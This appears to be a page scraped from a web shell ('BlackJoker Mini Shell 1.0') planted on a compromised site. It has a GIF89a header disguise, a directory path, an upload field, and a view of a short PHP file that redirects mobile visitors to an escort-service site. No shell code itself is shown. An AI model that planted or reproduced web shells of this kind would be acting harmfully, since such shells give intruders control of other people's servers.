GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/lib/
Upload File :
Current File : /home/serb/public_html/lib/Mobile_Redirect.php

<?php	
	if($_REQUEST['m'] == 'no')
	{
		$_SESSION['Site_View'] = 'Desktop';
	}
	
	if($_SESSION['Site_View'] != 'Desktop')
	{	
		require_once 'Mobile_Detect.php';	
		$detect = new Mobile_Detect;
		// Check for any mobile device, excluding tablets.
		if ($detect->isMobile() && !$detect->isTablet()) {
			header("Location: http://m.escortservice.org/");
			exit;
		}
	}
?>

./BlackJoker Mini Shell 1.0